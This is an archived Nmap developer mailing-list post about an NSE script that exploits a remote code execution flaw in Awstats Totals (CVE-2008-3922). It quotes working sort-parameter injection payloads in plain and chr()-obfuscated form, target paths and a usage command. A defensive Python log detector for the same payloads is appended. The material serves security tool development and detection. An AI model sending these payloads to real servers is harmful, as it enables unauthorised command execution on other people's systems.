Nmap Development mailing list archives
Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14
From: Toni Ruottu <toni.ruottu () iki fi>
Date: Mon, 11 Jul 2011 11:59:00 +0300
Could you change the output to look more like the output of smtp-vuln-cve2010-4344.nse? See http://nmap.org/nsedoc/scripts/smtp-vuln-cve2010-4344.html for an example.

On Mon, Jul 11, 2011 at 12:43 PM, Paulino Calderon <paulino () calderonpale com> wrote:
Hi nmap-dev,
description = [[
http-awstatstotals-exec exploits a remote code execution vulnerability in
Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It
works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]
Stealth mode encodes the command string using PHP's chr() function. Ex.
* Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
* Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>
Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]
---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---
--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
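An added example, not part of the post or of the NSE script: a detector for web-server access logs that flags requests shaped like the two sort-parameter payloads quoted above and recovers the command they carried, decoding the chr() chain of stealth mode. The log lines are constructed, and the format assumed is Apache combined log.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache combined-log lines: two requests shaped like the
# payloads quoted in the post (normal and stealth mode) and one benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jul/2011:12:43:01 +0300] "GET /awstatstotals/index.php?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Jul/2011:12:43:05 +0300] "GET /awstats/awstatstotals.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}&config=site HTTP/1.1" 200 498 "-" "curl/7.21"
198.51.100.3 - - [11/Jul/2011:12:44:10 +0300] "GET /awstatstotals/index.php?sort=unique&config=site HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The flaw is PHP evaluating a {${...}} construct inside the decoded sort value.
INJECT_RE = re.compile(r'\{\$\{')
CHR_RE = re.compile(r'chr\((\d+)\)')
GET_REF_RE = re.compile(r'\$_GET\[(\w+)\]')

def decode_chr_chain(value):
    """Turn chr(117).chr(110)... back into the string it builds."""
    return ''.join(chr(int(n)) for n in CHR_RE.findall(value))

def analyze_request(line):
    """Return a finding dict for an Awstats Totals sort-injection attempt, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for sort_value in params.get('sort', []):
        if not INJECT_RE.search(sort_value):
            continue
        if CHR_RE.search(sort_value):
            mode, command = 'stealth', decode_chr_chain(sort_value)
        else:
            # Normal mode pulls the command from a second query parameter.
            ref = GET_REF_RE.search(sort_value)
            command = params.get(ref.group(1), ['?'])[0] if ref else '?'
            mode = 'normal'
        return {'src': m.group('src'), 'path': parts.path, 'mode': mode, 'command': command}
    return None

def scan_log(text):
    """Run analyze_request over every line and keep only the findings."""
    return [f for f in map(analyze_request, text.splitlines()) if f]

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```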